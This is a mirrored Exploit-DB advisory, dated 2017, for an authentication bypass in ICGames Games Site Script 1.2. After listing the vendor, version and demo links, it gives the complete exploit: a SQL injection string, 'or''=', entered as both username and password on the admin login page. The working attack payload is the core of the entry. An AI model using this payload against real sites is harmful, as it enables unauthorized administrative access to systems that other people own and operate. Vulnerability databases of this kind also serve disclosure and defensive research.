ICGames-Games Site Script 1.2 – Authentication Bypass

  • 作者: Ihsan Sencan
    日期: 2017-01-20
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/41132/
  • # # # # # 
    # Exploit Title: ICGames-Games Site Script - Authentication Bypass
    # Google Dork: N/A
    # Date: 20.01.2017
    # Vendor Homepage: http://www.icloudcenter.com/
    # Software Buy: http://www.icloudcenter.com/games-site-script.htm
    # Demo: http://www.icloudcenter.net/demos/icgames/
    # Version: 1.2
    # Tested on: Win7 x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[beygir]ihsan[nokta]net
    # # # # #
    # Exploit :
    # http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
    # # # # #